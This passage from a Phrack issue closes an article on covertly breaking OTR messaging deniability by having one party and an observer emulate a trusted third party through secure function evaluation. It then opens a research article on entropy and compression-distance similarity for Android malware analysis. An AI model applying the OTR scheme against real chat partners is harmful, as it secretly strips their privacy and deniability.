MAC keys were public), the recording party knows that it was not generated afterwards. Let's look at a real-life example to shed some more light on what we're doing. Imagine two hackers A and B who want to talk about serious stuff (TM) using OTR. Both of them are slightly paranoid and don't trust each other. In particular, Bob fears that Alice might backstab him. However, as OTR is deniable, Bob assumes that even if Alice discloses the contents of their conversation, he could still plausibly argue that Alice just made it up to discredit him. So Bob ignores his paranoia and tells Alice his secrets. Alice indeed plans to backstab Bob. Her first plan is simple: She will just submit all the encrypted and authenticated messages to the police. The police will later be able to state in court that Alice didn't fake the messages after the conversation. She however quickly realizes that this approach is inherently flawed: Bob could argue that Alice just sent fake messages to the police (as Alice knows all the keys she could generate such fake messages). Alice knows that this problem could be fixed if the Police sniffed all the traffic themselves. But she also knows that this is going to be difficult, so she comes up with a second idea: Why not use a trusted third party? Instead of submitting her messages to the police, she will just disclose her private DSA key to her lawyer. Then, during her conversation with Bob, she will use her lawyer as a proxy (i.e. she will let *him* do the crypto). This way the lawyer can be sure that the conversation is authentic. The judges will trust Alice's lawyer in court (at least they'll trust him more than they trust Alice), so her problem is solved. Alice's setup would look like this: +-------+ | Alice | +-------+ ^ | Non-OTR (maybe SSL) v +------------+ | Lawyer | trust +----------------+ | Speaks for | <---------> | Police / Court | | Alice | +----------------+ +------------+ ^ | OTR (Bob thinks he talks to Alice) v +-------+ | Bob | +-------+ But now Alice realizes that she doesn't trust her lawyer enough to give him her private DSA key: He could misuse it to impersonate her. Also, Alice doubts that her lawyer's words would be trusted enough in court. This example shows the problems that Alice has when she wants to break the deniability of OTR. Her problems can be summarized as follows (we'll now call the police the "observing party" and the lawyer will be called "trusted third party"): a) The observing party needs to sniff the network traffic. That implies quite a privileged network position, as the traffic needs to be sniffed passively, i.e. without the help of A or B. Because if A or B would send their traffic to the observing party, A or B might just insert bogus messages into their "sniff" stream and the observing party couldn't be sure about the authenticity. Even worse, paranoid A and B could use an anonymizing network, so that sniffing their traffic would be a non-trivial task. b) Also, the authenticity of a message can only be proven to the observing party, but not to anybody else (as anybody else didn't sniff the traffic and the observing party could just have cut some pieces or inserted new ones). Problem b) is not that much of importance. Just imagine the observing party as the police, the judges or even Fnord. You should always assume that the observing party is exactly the guys you wanna protect yourself against. If you think that the police probably won't even get all the crypto stuff and therefore just believe any plaintext logfile you show them, that's OK (you're probably right). There might however be agencies that would not really trust plaintext logs. And those agencies might be very interested in the contents of some OTR conversations. Problem a) remains open. Obviously, neither A nor B really trust the observing party. If we had a trusted third party, we actually could mount an attack against OTR's deniability, just as described in the lawyer example above. Well, lucky us, neither A, nor B, nor the observing party trust anybody and therefore, there will be no trusted third party ;) Really? Interestingly, a trusted third party can be emulated using secure function evaluation. This is what we didn't tell in the section above: You can view a secure function evaluation scheme as a replacement for a trusted third party. So instead of letting a third party compute some function f(x, y), A and B can perform the computation on their own and still get the same result: both players only receive f(x, y) but A doesn't see y and B doesn't see x. So the main idea of our attack is: Emulate a trusted third party using secure function evaluation. The setup that Alice now plans is the following: +-------+ | Alice |<-----------+ +-------+ | ^ | | | SFE Voodoo for emulating the lawyer | | | v | +----------------+ | | Police / Court | | +----------------+ | | OTR | v +-------+ | Bob | +-------+ Our central idea is the following: A can send all the messages she received from B to the observing party (the police in the figure above, but that could really be everyone). The messages are still encrypted, so this is not a problem. To make sure that the messages are not faked by A, we need to make sure that A cannot produce valid MACs without the help of the observing party. We therefore share the MAC key between A and the observing party. Every time, A wants to validate or produce a MAC, she has to cooperate with the observing party. Later on, A can reveal the encryption key for any message to the observing party, which can be sure that the message is authentic. In the following section (4.1 - 4.3), we will provide a high-level overview of the attack. In section 4.4, you can find the actual protocol that Alice and the observing party use. ------[ 4.1 - Sharing Diffie-Hellman Keys OTR uses Diffie-Hellman to establish sort-lived MAC and encryption keys. The first part of our exercise is therefore to build a Diffie-Hellman compatible 3-party protocol that allows for sharing the generated key between two parties. The following protocol between Alice (A), Bob (B) and the observing party (O) works: O ----- g^o ----> A ---- (g^o)^a ----> B O <---- g^a ---- A A <--- g^b ---- B All computations are done modulo some prime p and g is a generator of a sufficiently large subgroup of Z_p*, just as Diffie-Hellman mandates. B will now compute g^oab as key. However, neither A nor O can reproduce that key. If A wanted to compute it, she would need to know O's secret exponent o. Similar for O. We can therefore say that the key k is shared between O and A, in the sense that A and O need to cooperate in order to actually use it. ------[ 4.2 - Generating MAC and Encryption Keys Now that we have established a shared Diffie-Hellman key, we need to securely derive the MAC and encryption keys from it. Let's assume we have a circuit C, which takes the shared Diffie-Hellman key k as input and returns the corresponding MAC and encryption keys as output. This circuit follows immediately from the OTR specification. Before we can evaluate the circuit, we first need to compute k (which neither A nor O know at this time). So the overall function that A and O want to compute is: f(a, o) = C(((g^b)^a)^o mod p) We can transform this function to a new circuit and evaluate it together (i.e. A and O evaluate the circuit). After the evaluation, A could get the encryption keys. But that's not a good idea, because the OTR spec mandates that MAC_key = hash(encryption_key). If A knew the encryption key, she could compute the according MAC key. Also, it would be bad if O would get the MAC keys, because then O could impersonate A and B. Therefore, we'll slightly modify the circuit, so that A may pick a random bit string, which the circuit XORs to the MAC key and to the encryption key (assuming the random string is long enough for both keys). The "blinded" MAC and encryption keys are then provided to A and O, the bitmask remains in A's memory. If they want to use one of the keys for something, they will evaluate a circuit that first XORs both halves together and then does the actual computation using the key. At no point in time, A or O actually learn the MAC or the encryption key. Now that we know how to generate all the symmetric key material, we are able to perform the full initial key exchange phase of OTR. ------[ 4.3 - Sending and Receiving Messages When A receives a message from B, she cannot immediately decrypt it because she doesn't know the decryption key. Also, verifying and sending messages needs O's cooperation. 1) Message Decryption If A wants to decrypt one of B's messages, she cooperates with O. Both parties will jointly evaluate a decryption circuit. The circuit will be built in such a way that only Alice will learn the result (i.e. Alice will again provide a random bitstring as input the the circuit, which is XORed to the result). 2) Message Verification If A wants to verify one of B's messages, she has to cooperate with O. A and O will jointly evaluate some sort of HMAC circuit, in order to find out whether a message is authentic or not. We can design the message verification function in such a way that O will immediately learn the encrypted message and the MAC verification result. This enables A to afterwards reveal the encryption key for a particular message, so that O will be convinced A didn't fake it. 3) Message Creation When A wants to create a message, she encrypts it together with O, just as described in 1). In order to compute a MAC for the message, A and O again cooperate. As each message has to contain a new Diffie-Hellman public key, A and O will jointly compute such a key using the scheme outlined above. ------[ 4.4 - The Final Protocol In this section we'll describe our final protocol. It offers the following features: * We have three parties: A, B and O. A and O cooperate to backstab B. B is not able to deny any of his messages towards O. * O will not learn any message plaintext, unless A explicitly tells O the respective keys. * O is not able to impersonate neither A nor B. * No trust relation between A and O is required. * A does not have to disclose a whole conversation to O; it is possible to only disclose selected messages. * B does not notice that A and O cooperate. ---------[ 4.4.1 - Initial Key-Exchange This section describes OTR's authenticated key-exchange (AKE). Bob starts the key exchange by picking a random r and x and sending AES_r(g^x), HASH(g^x) to Alice. That's the regular OTR protocol. Alice then does a Diffie-Hellman key-exchange with O as outlined in section 4.1. We assume that A and O communicate over a secure channel. O A <-------- AES_r(g^x), HASH(g^x) ----- B O <------- g^a ------------- A O -------- g^o ------------> A Now Alice sends her Diffie-Hellman public key to Bob. Note that she doesn't know the private exponent of the key: she knows only a and g^ao, but neither ao nor o. A ------------------ g^ao ------------> B Bob has already computed the common key k (which Alice can't do) and uses it to derive encryption keys c and c' and MAC keys m1, m1', m2, m2' (see the OTR specs [2] for details) by hashing k in various ways. Bob builds the following messages: M_B = MAC_m1(g^x, g^ao, pub_B, keyid_B) X_B = pub_B, keyid_B, sig_B(M_B) Where pub_B is Bob's public DSA key and keyid_B is an identifier for Bob's Diffie-Hellman proposal g^x. sig_B is created using Bob's DSA key. Using the already derived symmetric keys, he sends AES_c(X_B),MAC_m2(AES_c(X_B)) over to Alice. A <- r, AES_c(X_B),MAC_m2(AES_c(X_B)) - B Alice is now supposed to also derive all the symmetric keys and to use them to decrypt and verify the stuff that Bob sent. But Alice cannot do that, so she cooperates with O. O sends her a garbled circuit C1, which will compute C1(o, a, mask) = (c, c') XOR mask Alice randomly chooses mask, so only she will learn c and c'. In a number of oblivious transfers, Alice receives the keys for her input values from O. O --------- C1 ------------> A\ \ O -------- -----------> A \ O <------- ------------ A | O -------- -----------> A | Compute c, c' using SFE. Only A . | receives the values. . | . / O <----- eval(C1) ---------- A / O --- (c,c') XOR mask -----> A/ Now Alice is finally able to decrypt the stuff that Bob sent her. She does so and gets X_B. Currently, she is not able to verify the MAC_m2() value Bob sent - she'll do that later. First she sends sig_B(M_B) over to O. O <------- sig_B(M_B) ------ A In order to actually verify sig_B(M_B), A and O first need to compute M_B. As described above, M_B = MAC_m1(g^x, g^ao, pub_B, keyid_B). In order to compute that MAC, both parties again need to cooperate. O creates a circuit C2, which computes: C2(o, a, pub_B, keyid_B) = MAC_m1(g^x, g^ao, pub_B, keyid_B) Alice again uses oblivious transfers to obtain the keys for her secret input value a, evaluates the circuit and both parties obtain the result M_B. O --------- C2 --------------> A\ \ O -------- -------------> A \ O <------- -------------- A | O -------- -------------> A | Compute M_B using SFE. A and O . | receive the value. . | . / O <----- eval(C2) ------------ A / O -------- M_B --------------> A/ Now that both have computed M_B, they first check the signature sig_B(M_B), just as the OTR protocol mandates. If A and O are convinced that sig_B(M_B) is OK, they can verify the MAC_m2(...) that B sent earlier. Again, they perform some SFE voodoo to do that. The observing party prepares a circuit C3, which computes: C3(o, a, AES_c(X_B)) = MAC_m2'(AES_c(X_B)) A again uses oblivious transfers to obtain the keys for her input values and the result is shared between both parties. O --------- C3 --------------> A\ \ O -------- -------------> A \ O <------- -------------- A | O -------- -------------> A | Compute MAC_m2'(AES_c(X_B)) using . | SFE. Both receive the result. . | . / O <----- eval(C3) ------------ A / O --------- MAC -------------> A/ Now A and O are convinced that the key exchange with B succeeded. But they still need to convince B that everything is OK. In particular, OTR mandates that A should compute M_A = MAC_m1'(g^ao, g^x, pub_A, keyid_A) X_A = pub_A, keyid_A, sig_A(M_A) and then send AES_c'(X_A), MAC_m2'(AES_c'(X_A)) over to B. Computing the AES part can be done by A, because A knows the key c'. But for computing the MAC, A and O again need to cooperate. First, A sends AES_c'(X_A) over to O. Then O prepares a circuit C4, which computes: C4(o, a, AES_c'(X_A)) = MAC_m2'(AES_c'(X_A)) Using oblivious transfers, Alice obtains the keys for her inputs from O. After evaluating the circuit, A and O obtain MAC_m2'(AES_c'(X_A)). O <----- AES_c'(X_A) -------- A\ O --------- C4 --------------> A \ \ O -------- -------------> A | O <------- -------------- A | Compute MAC_m2'(AES_c'(X_A)). Both O -------- -------------> A | parties receive the value. . | . / O <----- eval(C4) ------------ A / O -- MAC_m2'(AES_c'(X_A)) ---> A/ That's it. A can now send all the required values to B. - AES_c'(X_A), MAC_m2'(AES_c'(X_A)) -> B B verifies all the stuff (just like A did but without the SFE) and the key exchange is done. ---------[ 4.4.2 - Message Exchange Once they have exchanged their initial key material, Alice and Bob can exchange actual messages. Suppose, Alice wants to send a message to Bob; we'll restrict ourselves to that scenario. Receiving messages works similar. Alice now does the following (from the OTR protocol spec [2]): Picks the most recent of her own Diffie-Hellman encryption keys that Bob has acknowledged receiving (by using it in a Data Message, or failing that, in the AKE). Let key_A be that key, and let keyid_A be its serial number. If the above key is Alice's most recent key, she generates a new Diffie-Hellman key (next_dh), to get the serial number keyid_A+1. To do this, Alice again needs to cooperate with the observing party. The steps are exactly the same as we have already seen in the initial key-exchange: O <------- g^a -------------- A O -------- g^o -------------> A Alice now uses g^ao as next_dh. When she computed next_dh, Alice picks the most recent of Bob's Diffie-Hellman encryption keys that she has received from him (either in a Data Message or in the AKE). Let key_B be that key, and let keyid_B be its serial number. Now Alice would actually need to use Diffie-Hellman to compute a fresh shared key with Bob, which she can use to derive the encryption and MAC key. But as she doesn't really know the private exponent (she knows g^ao, a and g^a, but not ao), she again needs to cooperate with O. So here we go: O prepares a circuit C1: C1(o, a, mask) = (ek, mk) XOR mask The circuit will compute both, ek and mk (the encryption and MAC keys), blinded with some value chosen by Alice. The result will be supplied only to the observing party. Alice will keep the value of mask. In a number of oblivious transfers, Alice receives the keys for her input values from O. O --------- C1 ------------> A\ \ O -------- -----------> A \ O <------- ------------ A | O -------- -----------> A | Compute (ek, mk) XOR mask using SFE. . | Only O receives the result. . | . / O <----- eval(C1) ---------- A / Alice now picks a value ctr, so that (key_A, key_B, ctr) is unique. The ctr value is needed, because AES is going to be used in counter mode to encrypt Alice's payload. The next step for Alice is to encrypt her message. As she doesn't know the encryption key, O prepares a circuit C2 for her: C2(ek_o, ek_a, ctr, msg) = AES-CTR_ek,ctr(msg) The inputs ek_o and ek_a denote O's and A's knowledge about ek, which is ek XOR mask in O's case and mask in A's case. The result of the circuit will only be provided to A (i.e. A just doesn't send it over to O). In a number of oblivious transfers, Alice receives the keys for her input values from O. O --------- C2 ------------> A\ \ O -------- -----------> A \ O <------- ------------ A | O -------- -----------> A | Encrypt msg using SFE. Only A . | receives the result. . / . / Now Alice can compute: T_A = (keyid_A, keyid_B, next_dh, ctr, AES-CTR_ek,ctr(msg)) T_A already contains Alice's message, but she still needs to MAC it. This is again done by A and O together. O prepares a circuit C3: C3(mk_o, mk_a, T_A) = MAC_mk(T_A) O --------- C3 --------------> A\ \ O -------- -------------> A \ O <------- -------------- A | Compute MAC_mk(T_A). Both O -------- -------------> A | parties receive the value. . | . / O <----- eval(C3) ----------- A / O ----- MAC_mk(T_A) --------> A/ Please be aware that Alice will keep T_A secret. Although T_A doesn't contain any plaintext, Alice does not want to disclose it to the observing party. If she did, then her own deniability would also be gone. Also, the OTR protocol mandates that Alice should send her old MAC keys in plaintext to Bob, so that they can be considered public. If A and O wanted to, they could do that (by computing the old MAC key again and sharing the result). But as long as Bob doesn't check what Alice sent, she can just send garbage. Indeed, in its current version (libotr 3.2.0), the OTR implementation doesn't check the disclosed MAC keys. Consider the excerpt from proto.c, line 657: --- snip --- /* Just skip over the revealed MAC keys, which we don't need. They * were published for deniability of transcripts. */ bufp += reveallen; lenp -= reveallen; --- snap --- So Alice can safely send: A -T_A,MAC_mk(T_A),oldmackeys=foobar-> B ------[ 4.5 - What's Left We have seen that in a scenario where at least one party cooperates with the attacker, deniability is non-trivial. Our construction can be extended and adopted and we conjecture that it quite generally applies to deniable messaging protocols. Regarding performance: Yeah, we know that all the SFE voodoo can be quite expensive. Especially modular exponentiation in circuits is not really cheap. However, there are ways to optimize the basic scheme we have outlined here. If you're interested in that, you might wanna read [5] as an introduction. Also, refer to section 4.5.2, which outlines one particular optimization of our Diffie-Hellman-scheme. Regarding network latency: When looking at all the crypto protocols outlined in this article (especially at oblivious transfers), you will notice that often multiple messages need to be exchanged. If you need 3 messages for one oblivious transfer and you want to perform 128 oblivious transfers (for some 128-bit crypto key or so), then you end up with 384 messages being exchanged. In terms of network latency, that might be troublesome. However, there are two things that help us: first, we can perform oblivious transfers in parallel (i.e. still exchange three messages but every message now contains data for 128 oblivious transfers). We can also precompute many values and exchange them before they are really needed (random values for instance). ---------[ 4.5.1 - FAQ Q: This is all bullshit! I could just share my private keys with the police, and that would also kill deniability! Yep. And the police would then be able to impersonate you. One of our key points is that you don't need to trust the observing party, neither need they to trust you. A: But the observing party won't be able to prove anything in court! Well, yes and no. In a constitutional state you'd need to actually prove stuff in court. Unfortunately, such states are rare. But even if you live in such a state, then the observing party could be the judge. Q: But all the conversations that I had before my peer cooperated with the observing party are deniable, right? A: Yes, unless the observing party sniffed your traffic (if you used a decent anonymizer, this is unlikely). Q: Wait, the observing party so far only learned that *somebody* has sent a message. But how do they know it was the person that I tell them it was? Good question. This knowledge is generated during the initial key exchange of OTR. To be precise, the observing party and the backstabber both learn the identity of the conversation peer when he signs his key-exchange proposal with his DSA key. The observing party also sees that and as they track all subsequent key-exchanges, they can build a "chain of evidence". Q: But doesn't [4] already kill the deniability of OTR? A: Ha, even better question! At least it attacks the strong deniability of OTR. However, our scheme also attacks the weak deniability. Furthermore, the attacker in [4] has far more capabilities than in our model. In [4], the attacker is able to arbitrarily read and modify network traffic. In our model, the attacker can rely on the cooperation with one of the two conversation partners. Q: OK, I'm convinced. Is there any implementation? A: You're welcome to build one ;) See section 4.5.2 for details. ---------[ 4.5.2 - How to Implement? If you want to implement the scheme outlined above, first of all, you need some framework for secure function evaluation. There are a number of implementations out there, for instance Fairplay [6] or TASTY [5]. Once you got your SFE framework running, you need to implement all the functions that need to be computed jointly. The Diffie-Hellman stuff is probably most efficient when implemented using a homomorphic cryptosystem (such as RSA or ElGamal maybe). Now you may ask: how does a multiplicatively homomorphic scheme help us computing DH keys? Well. There's some nice optimization, which basically reduces the modular exponentiation to a modular multiplication: Alice picks some random j and sends g^(ab+bj) over to the observing party. The observing party sends g^o. A <---- g^b ------------ B O <------ g^(ab+j) ------ A O -------- g^o ---------> A Note that Bob cannot compute g^abo, because Alice's value is "blinded" with j. Alice cannot do so neither; she doesn't know o. Bob however can compute g^(abo+jo). Alice can compute g^jo and also g^-jo, because she knows j. If Alice would send g^-jo to O, then O could compute g^(abo+jo) * g^-jo = g^abo This is only one modular multiplication. So instead of doing a whole modular exponentiation, the circuit that Alice and the observing party jointly compute does roughly the following: C(o, a) = derive_keys(o*a) Where the function derive_keys() is the OTR key derivation function (hashing the common key in different ways to generate symmetric key material), O's input value will look like g^(abo+jo) and A's input value will look like g^-jo. All the symmetric operations (hashes and block ciphers) should probably be implemented as circuits, for instance using Fairplay. Both SFE schemes (circuits and homomorphic crypto) can be combined using the TASTY approach. --[ 5 - References [1] http://www-ee.stanford.edu/~hellman/publications/24.pdf [2] http://www.cypherpunks.ca/otr/Protocol-v2-3.0.0.html [3] http://eprint.iacr.org/2004/175.pdf [4] http://www.jbonneau.com/OTR_analysis.pdf [5] http://eprint.iacr.org/2010/365.pdf [6] http://www.pinkas.net/PAPERS/MNPS.pdf [7] http://tinyurl.com/84z7wpu --[ 6 - Greetingz First of all I have to give a big shout to bruhns, who developed this stuff together with me! There's this one person, which I'd like to say thanks for everything (and that's quite a lot). Unfortunately, i cannot name this person here. 291646a6d004d800b1bc61ba945c9cb46422f8ac. Also a big thanks to Phrack staff for reading through all this and supplying me with real helpful feedback! Greetingz go out to the following awesome people in no particular order: ths, fabs, joern, nowin, trapflag, jenny, twice#11 --[ EOF ============== Page 12/17 ============== ==Phrack Inc.== Volume 0x0e, Issue 0x44, Phile #0x0f of 0x13 |=-----------------------------------------------------------------------=| |=------------------=[ Similarities for Fun & Profit ]=------------------=| |=-----------------------------------------------------------------------=| |=---------------=[ Pouik (Androguard Team) and G0rfi3ld ]=--------------=| |=------------------=[ d@t0t0.fr / g0rfi3ld@gmail.com ]=-----------------=| |=-----------------------------------------------------------------------=| 1/ Introduction 1.1 Complexity of a sequence 1.2 Histograms and classical Shannon Entropy 1.3 From the Classical Entropy towards Descriptional Entropy 1.4 Normalized Compression Distance (NCD) 2/ Similarities 2.1 Between two sets of elements 2.2 In a set of elements 3/ Real World: Android 3.1 Similarities between two applications 3.2 Differences between two applications 3.3 Looking for a signature in applications 4/ Conclusion 5/ References 6/ Code --[ 1 - Introduction How can we verify that two numerical objects are identical? It's easy, you just have to compare all characters, one by one. But how can we say that two numerical objects are "similar" but not identical? Can we define a measure of "similarity", which will give ipso facto a measure of "dissimilarity"? But what are these numerical files that we want to analyze or compare? It could be anything, from pictures to numerical data files. We will focus in this work on goodware and malware, (a goodware is not a malware :). So, if the numerical objects are software, can we define a measure of similarity and how? And why? We will see this. Our problem can be simply defined as: How can we choose quickly, from a set M of known software files {m1, ..., mn}, with n >= 1, the subset of the files of M that are the "most similar" to a target A? And how can we find quickly interesting differences without using a direct approach like graph isomorphism [21, 25] between two similar but different applications? We will show you how we can use a filtering tactic to select the best (i.e. the "most similar" to a target A) files out of the malware set M. We propose the use of two different tactics, using the entropy as a first filtering tactic to filter the set M and the Normalized Compression Distance (NCD) for a second filtering tactic. We also propose a new entropy which is a simple generalization of the classical Shannon entropy. We call this entropy the "descriptional entropy", which to the authors knowledge, is presented here for the first time. While the tools that we present here are truly generic, i.e. they can be used with any files, we will give some examples through the analysis and comparison of Android applications. ----[ 1.1 Complexity of a sequence We want to compare DNA sequences [24], music files or pictures [20]. We need a notion of the "complexity" of a sequence, to be able to compare them, to sort them or to index them. But what is a complex sequence or how do we define a complex sequence? There are lots of situations where we need a tool to answer. To be more exact, we need a computable measure of the complexity of a sequence, to index for example a set of files. The sequence can be the bytes of a picture, a DNA sequence, a source code or an executable file; in other words, whatever can be stored in a file. In this paper, we will say sequence, for any sequence of ASCII characters. So, can we define the "complexity" of a sequence? Let us give a toy example, we consider the four sequences: - S1 = "aaabbb" - S2 = "ababab" - S3 = "bbbaaa" - S4 = "abbaab" Intuition tells us that: - S1 and S3 are more similar than S1 and S2 or S2 and S3. - S1 is more "simple" than S2. - S1, S2 and S3 are more "simple" than S4. It is easy to see that S1 is the reverse of S3, so it could be interesting for any function Comp() defined as a measure of the complexity of a sequence to verify that Comp(S1) = Comp(S3). ----[ 1.2 Histograms and classical Shannon Entropy Let S be a sequence of characters, with an "alphabet" of n different symbols (generally characters). Let pi be the computed probability of occurrence of each of the n character in S, we will call the histogram vector Hist = {p1, ..., pn} and then the classical Shannon entropy of the sequence S is defined by: n __ \ H(S)= - / pi log(pi) |__ i=1 (where log(x) is the logarithmic function in base 10). In our toy example, S1 = "aaabbb", S2 = "ababba" and S3 = "bbbaaa", the alphabet is {"a", "b"}. They have a same histogram vector entropy: Hist(S1) = Hist(S2) = Hist(S3) = {1/2, 1/2} which will give the same entropy: H(S1) = H(S2) = H(S3) = 1. If we use the classical Shannon entropy H(), the equation holds as H(S1) = H(S3). However we also have H(S1) = H(S2) which contradicts 'S1 is more simple than S2'. So the function is not suitable. Let's see another problem with the classical Shannon entropy: if S is a sequence of characters with S...S a concatenation of S and H() the Shannon entropy, then we have H(S) = H(SS) = H(SSS) = H(S...S). This is not really good for our purposes! We will see that we can do better with a generalization of the Shannon entropy which we will call "Descriptional Entropy". ----[ 1.3 From the Classical Shannon Entropy towards the Descriptional Entropy A lot of ways to measure the complexity of a sequence have been proposed. For example, the Lempel-Ziv complexity [29,30] is defined as the number of different subsequences (patterns) in a sequence when we apply the LZ algorithm. The sequence complexity, or the complexity index, of a sequence S = s1...sn is defined as the number of different subsequences in S [31,32]. In all cases we obtain a number which is difficult to use, or we have to take the histogram vector. But to compare two histogram vectors of unequal size is not easy. We propose here a new approach. Given a complexity measure based on the count of different subsequences, and if we have N different subsequences, we can compute the histogram vector Hist(S) = {P1, ..., PN} for this set, with P1+...PN=1 of course. So now we can compute the entropy of this histogram vector; we propose to call this entropy the "Descriptional Entropy" of a sequence: N __ \ Hd(Hist(S))= - / Pi log(Pi) |__ i=1 To simplify we will write Hd(S) for Hd(Hist(S)). From now we will use the log2(x) function, i.e. the log base 2 function. Let us show it with the toy example, again, S1 = "aaabbb", S2 = "ababba", S3 = "bbbaaa" and S4 = "abbaab". If we choose to count all different subsequences we will have (to simplify we neglect the "empty" sequence which is used sometimes): (1) For S1 = "aaabbb": the subsequence set is (in alphabetical order) {a,aa,aaa,aaab,aaabb,aaabbb,aab,aabb,aabbb,ab,abb,abbb,b,bb,bbb} and the histogram vector: Hist(S1)={1/7,2/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21, 1/7,2/21,1/21}. If we sort it we have: {1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,2/21,2/21, 1/7,1/7} and so the descriptional entropy will be (remember: we use the base 2 logarithmic function log2(x)): Hd(S1) = - ( 1/21 log2(1/21) x 11 + 2/21 log2(2/21) x 2 + 1/7 log2(1/7) x 2 ) Hd(S1) = 11/21 log2(21) + 4/21 log2(21/2) + 2/7 log2(7) Hd(S1) = 11/21 log2(21) + 4/21 log2(21) - 4/21 log2(2) + 2/7 log2(7) Hd(S1) = 5/7 log2(21) - 4/21 log2(2) + 2/7 log2(7) which gives: Hd(S1) = 3.74899 (2) For S2 = "ababab": the subsequence set is (in alphabetical order): {a,ab,aba,abab,ababa,ababab,b,ba,bab,baba,babab} and the histogram vector: Hist(S2)= {1/7,1/7,2/21,2/21,1/21,1/21,1/7,2/21,2/21,1/21,1/21} If we sort it we have: {1/21,1/21,1/21,1/21,2/21,2/21,2/21,2/21,1/7,1/7,1/7} and the descriptional entropy will be: Hd(S2) = 3 log2(7) / 7 + 8 log2(21/2) / 21 + 4 log2(21) / 21 which gives: Hd(S2) = 3.3321 (3) For S3 = "bbbaaa": the subsequence set is (in alphabetical order) {a,aa,aaa,aaab,aaabb,aaabbb,aab,aabb,aabbb,ab,abb,abbb,b,bb,bbb} and the histogram vector: Hist(S3)={1/7,2/21,1/21,1/7,1/21,1/21,1/21,2/21,1/21,1/21,1/21, 1/21,1/21,1/21,1/21} If components are sorted we have: {1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,2/21,2/21, 1/7,1/7} and the descriptional entropy will be: Hd(S3) = 2 log2(7))/7 + 4 log2(21/2))/ 21 + 11 log2(21)/21 which gives: Hd(S3) = 3.74899 (4) For S4 = "abbaab": the subsequence set is (in alphabetical order) {a,aa,aab,ab,abb,abba,abbaa,abbaab,b,ba,baa,baab,bb,bba,bbaa,bbaab} and the histogram vector: Hist(S4) = {1/7,1/21,1/21,2/21,1/21,1/21,1/21,1/21,1/7,1/21, 1/21,1/21,1/21,1/21,1/21,1/21} If components are sorted we have: {1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21, 2/21,1/7,1/7} and the descriptional entropy will be: Hd(S4) = 2 log2(7) / 7 + 2 log2(21/2) / 21 + 13 log(21) / 21 which gives: Hd(S4) = 3.84423 So, we have: Hd(S2) = 3.3321 < Hd(S1) = Hd(S3) = 3.74899 < Hd(S4) = 3.84423. The result Hd(S1) = Hd(S3) = 3.74899 is expected. However, the result Hd(S2) = 3.3321 < Hd(S1) is a little bit surprising, but the whole set of inequalities is correct. S4 is more "complex" than S1, S2 and S3. Let us give another simple example, if we choose S5 = "bbbbbaaaaa" and S6 = S5S5 = "bbbbbaaaaabbbbbaaaaa". We will have: Hd(S5) = 4.82265 and Hd(S6) = 6.68825, and it is not so difficult to prove that: for any sequence S: Hd(S) < Hd(SS) < Hd(SSS) < Hd(S......S). This sounds good :) However there is a drawback since for a very long sequence S the (practical) computational complexity of the computation of Hd(S) is not cheap. Well, it's true, of course. We could probably find a fast(er) algorithm, based for example on some variation of the Aho-Corasick, Boyer-Moore or Knuth-Morris-Pratt algorithms. We can also say that we only consider subsequences of length bounded by a suitable integer k. ----[ 1.4 Normalized Compression Distance (NCD) The Kolmogorov complexity is a very interesting concept and it has a lot of applications [18,23]. We present here this concept to explain the power of Normalized Compression Distance (NCD). Let us cite Wikipedia [26]: "In algorithmic information theory (a subfield of computer science), the Kolmogorov complexity of an object, such as a piece of text, is a measure of the computational resources needed to specify the object. It is named after Soviet Russian mathematician Andrey Kolmogorov. Kolmogorov complexity is also known as descriptive complexity, Kolmogorov Chaitin complexity, algorithmic entropy, or program-size complexity." Well, it is a very good abstract. Unfortunately, The Kolmogorov complexity K(S) of a sequence S is not computable, so we can just approximate it. The use of any compression algorithm gives a trivial and evident upper bound of K(S). Read the book [22] for a deep and modern presentation and for applications. (Yes there are applications). We switch now to the NCD, which is always computable. To be able to use the Kolmogorov complexity we need to extend the informational distance to have a normalized value which indicates the similarities or dissimilarities between two elements/strings. Let us recall what a distance is. Wikipedia says: "...a distance function on a given set M is a function d: MxM -> R, the set of real numbers, that satisfies the following conditions: a) d(x,y) >= 0, and d(x,y) = 0 if and only if x = y. (Distance is positive between two different points, and is zero precisely from a point to itself.) b) It is symmetric: d(x,y) = d(y,x). (The distance between x and y is the same in either direction.) c) It satisfies the triangle inequality: d(x,z) <= d(x,y) + d(y,z). (The distance between two points is the shortest distance along any path). Such a distance function is known as a metric." Suppose we have two sequences x and y. We consider the concatenated sequence xy, and a compressor algorithm Comp with L(Comp(S)) the length of the compressed string, i.e. the number of bytes of the compressed string. The main idea of the NCD [17,33] is that L(Comp(xy)) will be almost equal to L(Comp(x)) if x = y. And L(Comp(xy)) will be close to L(Comp(x)) if x and y are similar without being equal. Let us give now the definition of dNCD(x,y): (L(Comp(x|y)) - min{L(Comp(x)), L(Comp(y))}) - dNCD(x, y) = ------------------------------------------------- max{L(Comp(x)), L(Comp(y))} This formula returns a value from 0.0 (maximally similar) to 1.0 (maximally dissimilar). 1.0? Oh yes if the compressor works correctly, but practically we can manage this. --[ 2 - Similarities In the next two sections, we will present two algorithms which can be used with any set of elements. Elsim (included in the code archive at the end of this paper) is our implementation of those algorithms. It is open source software (LGPL), and with it you can compute similarities between any "described" elements :) ----[ 2.1 Between 2 sets of elements In this part we will describe how we can create a generic algorithm to search the similarities between 2 sets of elements. This algorithm can be used to compare all kind of elements if you are able to find a correct way to represent your data. For the comparison of our data, we will use the NCD, thus indirectly the Kolmogorov complexity. One of the major drawbacks [16] of the compression is the "time" required :) The tool can be powerful, but if you use a compression algorithm like LZMA, you are limited to "hello world" problems due to the speed of the compression. You need to choose carefully your (lossless) compressor. A compressor C is "normal" if the following properties (inequalities) are satisfied [17]: 1) Idempotency: C(xx) = C(x), and C(E) = 0, where E is the empty string. 2) Monotonicity: C(xy) >= C(x). 3) Symmetry: C(xy) = C(yx). 4) Distributivity: C(xy) + C(z) <= C(xz) + C(yz). The important theorem from [18] reveals the power of the dNCD distance: "if the compressor C is normal, then the dNCD is a normalized admissible distance satisfying the metric inequalities that is, a similarity metric." With this theorem, we can use the NCD as a simple tool to measure the similarity between elements. We have performed tests on different compressors to test them in respect to both the previous properties and their speed. If the algorithm is too slow it will be really useless for practical purposes. We chose to compress random signatures (see 3.1) because it's close to our application domain (see 3). ########################################################################## Property | Number of success | size of final compression | speed (seconds) ########################################################################## 